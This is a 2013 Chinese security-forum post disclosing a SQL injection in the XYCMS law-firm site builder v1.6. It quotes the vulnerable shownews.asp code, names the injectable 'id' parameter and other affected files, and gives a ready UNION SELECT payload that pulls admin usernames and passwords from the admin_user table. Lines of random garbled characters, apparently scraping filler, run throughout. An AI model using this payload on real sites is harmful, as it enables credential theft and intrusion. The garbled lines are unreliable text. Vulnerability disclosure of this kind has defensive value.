中国网络渗透测试联盟
标题:
XYCMS律师事务所建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
5 l" F5 D- O6 |
+ T5 j* ^8 P- K5 M, z1 a, Y
淫荡分割线
+ r( @ W$ h8 z7 M5 `
--------------------------------------------------------
* O/ M D/ b) S5 E/ c
! c0 L/ @; Q7 V. q
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
0 [, `: G+ M, `4 V- d7 H
源码地址:
http://down.chinaz.com/soft/29233.htm
" r8 M$ e' ` P
+ c! @- N6 j6 I, e
漏洞文件:shownews.asp
( `1 h& U; A$ V' k
漏洞代码:7-13行
9 ~+ }% k0 c( D1 ^2 }% Y# t5 W% g
$ }" ~- K4 ]3 T N: G/ }
7 |9 J! v0 n* V) s) V
<%
2 t" ^' A9 ~" N* }& C. ~
id=request.QueryString("id")
3 E7 d& O2 I8 x2 m
; Y4 a. C* G. @- R+ u
set snews=server.createobject("adodb.recordset")
* A+ e) F6 O. p6 r' |6 T" ~
exec="select * from [news] where id="&id
* ^+ n, _0 L& D1 ~+ }
snews.open exec,conn,1,1
) ~& D& W. |4 A$ U6 E
%>
1 b9 _7 B1 I# M8 r E4 p% r9 w. |
) S! z9 `6 s7 E4 b. W
% B4 r9 f' r) O% y
什么过滤都没有 直造成注入
; e; p" C( _8 e1 ?! t$ Q
; ^ Z0 x2 k3 k* ]/ |# ~7 G. x6 T
注入点:
http://127.0.0.1:99/shownews.asp?id=xx
- l& l' v0 ^5 r; o$ D
+ u6 Q1 R$ W4 Y1 W
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
& R# ?- g- z! L3 n5 M' t) x! A8 S" i* Q
0 K7 V4 P5 c* x2 `- n1 M% I
0 m+ e7 m* R* L! D8 B e
exp: union select 1,admin,password,4,5,7 from admin_user
6 p1 g0 R$ h5 p
2 o2 S; E: d4 _/ s+ Q- l
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2